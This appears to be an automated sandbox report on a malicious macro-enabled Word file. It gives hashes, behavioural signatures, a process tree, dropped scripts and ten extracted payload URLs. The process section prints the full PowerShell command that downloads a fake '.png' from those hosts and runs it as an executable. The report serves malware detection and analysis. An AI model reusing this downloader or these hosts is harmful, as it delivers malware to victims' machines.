Analysis
-
max time kernel
70s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 03:38
Static task
static1
Behavioral task
behavioral1
Sample
08142020_1955816493.docm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
08142020_1955816493.docm
Resource
win10v2004-20220414-en
General
-
Target
08142020_1955816493.docm
-
Size
381KB
-
MD5
8b9a76bee8f32292b25d55383c100d2c
-
SHA1
fe63d6a4046682dabce9cc6e49bc22fbbb8399e4
-
SHA256
a1ea10b25a1dd9165910a6859847f4bc6437f06e4651f8cc31ddf3b9d50be3c2
-
SHA512
9fc9740134ec8bd07b7f18ce2ab4b52136ebce65ed7d5a62493efceb545ba2a1aedd2217360f933f386716ccb5554a0700aef17949b724e7e301ab6cdaa22d15
Malware Config
Extracted
http://rijschoolfastandserious.nl/rprmloaw/111111.png
http://nanfeiqiaowang.com/tsxwe/111111.png
http://forum.insteon.com/suowb/111111.png
http://webtest.pp.ua/yksrpucvx/111111.png
http://quoraforum.com/btmlxjxmyxb/111111.png
http://quickinsolutions.com/wfqggeott/111111.png
http://bronco.is/pdniovzkgwwt/111111.png
http://studiomascellaro.it/wnzzsbzbd/111111.png
http://craniotylla.ch/vzufnt/111111.png
http://marineworks.eu/dwaunrsamlbq/111111.png
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
explorer.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 216 3928 explorer.exe WINWORD.EXE -
Blocklisted process makes network request 15 IoCs
Processes:
powershell.exeflow pid process 25 2780 powershell.exe 27 2780 powershell.exe 28 2780 powershell.exe 30 2780 powershell.exe 49 2780 powershell.exe 50 2780 powershell.exe 53 2780 powershell.exe 55 2780 powershell.exe 56 2780 powershell.exe 58 2780 powershell.exe 59 2780 powershell.exe 61 2780 powershell.exe 64 2780 powershell.exe 66 2780 powershell.exe 67 2780 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5036 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 5112 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings explorer.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3928 WINWORD.EXE 3928 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2780 powershell.exe 2780 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
taskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 5112 taskkill.exe Token: SeDebugPrivilege 2780 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
WINWORD.EXEpid process 3928 WINWORD.EXE 3928 WINWORD.EXE 3928 WINWORD.EXE 3928 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WINWORD.EXEexplorer.exeWScript.execmd.exedescription pid process target process PID 3928 wrote to memory of 216 3928 WINWORD.EXE explorer.exe PID 3928 wrote to memory of 216 3928 WINWORD.EXE explorer.exe PID 2516 wrote to memory of 4356 2516 explorer.exe WScript.exe PID 2516 wrote to memory of 4356 2516 explorer.exe WScript.exe PID 4356 wrote to memory of 4092 4356 WScript.exe cmd.exe PID 4356 wrote to memory of 4092 4356 WScript.exe cmd.exe PID 4092 wrote to memory of 5112 4092 cmd.exe taskkill.exe PID 4092 wrote to memory of 5112 4092 cmd.exe taskkill.exe PID 4092 wrote to memory of 2780 4092 cmd.exe powershell.exe PID 4092 wrote to memory of 2780 4092 cmd.exe powershell.exe PID 4092 wrote to memory of 5036 4092 cmd.exe timeout.exe PID 4092 wrote to memory of 5036 4092 cmd.exe timeout.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\08142020_1955816493.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exeexplorer.exe C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs2⤵
- Process spawned unexpected child process
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\BlotRots\djsfgytdftftyYFGfghffghYYTTT.cmd" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exeTaskkill /IM "winword.exe" /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWerShell Foreach($url in @('http://rijschoolfastandserious.nl/rprmloaw/111111.png','http://nanfeiqiaowang.com/tsxwe/111111.png','http://forum.insteon.com/suowb/111111.png','http://webtest.pp.ua/yksrpucvx/111111.png','http://quoraforum.com/btmlxjxmyxb/111111.png','http://quickinsolutions.com/wfqggeott/111111.png','http://bronco.is/pdniovzkgwwt/111111.png','http://studiomascellaro.it/wnzzsbzbd/111111.png','http://craniotylla.ch/vzufnt/111111.png','http://marineworks.eu/dwaunrsamlbq/111111.png')) { try{$path = 'C:\BlotRots\Loterios.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exeTIMEOUT /T 104⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\BlotRots\djsfgytdftftyYFGfghffghYYTTT.cmdFilesize
5KB
MD52d63e5c7ff61a560f0cc7dccd0661bf6
SHA1995efc69bd84b193786de1a993ad7052f14e9542
SHA25694a12075382cb44133ba8dd51973b583d4c2514f7d3d7414ae4d9a92b5354584
SHA51294254c0bbbc1c06bc93aeb6264d7d2cdd46ba3ff55fccdc3a669d3d713083a45b9e066a780f5b9684e6b8226c4acaca80df6d61ad5bb1d53c6bb66d9ec2e073c
-
C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbsFilesize
68KB
MD5ad7b09adba59218ce485148faf21dc82
SHA10a3851f903f7d928688e5ebeee13f6d5d921b4de
SHA256214fd312196dd5769f94ed778c50df1eaf49a5c8287c67edcf2fbd05dff02cb2
SHA5121fb8361f343e174574eae776fae701580c32dcbb6e120e181190bafb80d5968af788d1edb68f1450d6ddbd62f0bc15d8d9c5bcce6187d712a3afe71c57669f4f
-
C:\ProgramData\UIYUIYUIYuiyuiYUIYYuyty.vbsFilesize
2KB
MD5f07e30c22ead3c49606617eb04fbf9c7
SHA1539dbd8cda2c1e6ada7a02e146c33b5aae7b1099
SHA2564639cb4ccdef149ef325770ccf4fff658b7cb528d71661113dbfe9e1c683dbf9
SHA51210f721ecf33fe97d074e2b5dd538ff83527a7db3ac4a0cfda183db9c9a2949dc9dd17361eb89e40e4a9865444c721108e1c4b7525337d83ba533250cb6ab052b
-
memory/216-138-0x0000000000000000-mapping.dmp
-
memory/2780-149-0x0000000000000000-mapping.dmp
-
memory/2780-151-0x00007FFCA7520000-0x00007FFCA7FE1000-memory.dmpFilesize
10.8MB
-
memory/2780-150-0x00000153F88A0000-0x00000153F88C2000-memory.dmpFilesize
136KB
-
memory/3928-134-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmpFilesize
64KB
-
memory/3928-137-0x000001EAB62C0000-0x000001EAB62C4000-memory.dmpFilesize
16KB
-
memory/3928-136-0x00007FFC84500000-0x00007FFC84510000-memory.dmpFilesize
64KB
-
memory/3928-135-0x00007FFC84500000-0x00007FFC84510000-memory.dmpFilesize
64KB
-
memory/3928-142-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmpFilesize
64KB
-
memory/3928-143-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmpFilesize
64KB
-
memory/3928-145-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmpFilesize
64KB
-
memory/3928-144-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmpFilesize
64KB
-
memory/3928-130-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmpFilesize
64KB
-
memory/3928-133-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmpFilesize
64KB
-
memory/3928-132-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmpFilesize
64KB
-
memory/3928-131-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmpFilesize
64KB
-
memory/4092-146-0x0000000000000000-mapping.dmp
-
memory/4356-141-0x0000000000000000-mapping.dmp
-
memory/5036-152-0x0000000000000000-mapping.dmp
-
memory/5112-148-0x0000000000000000-mapping.dmp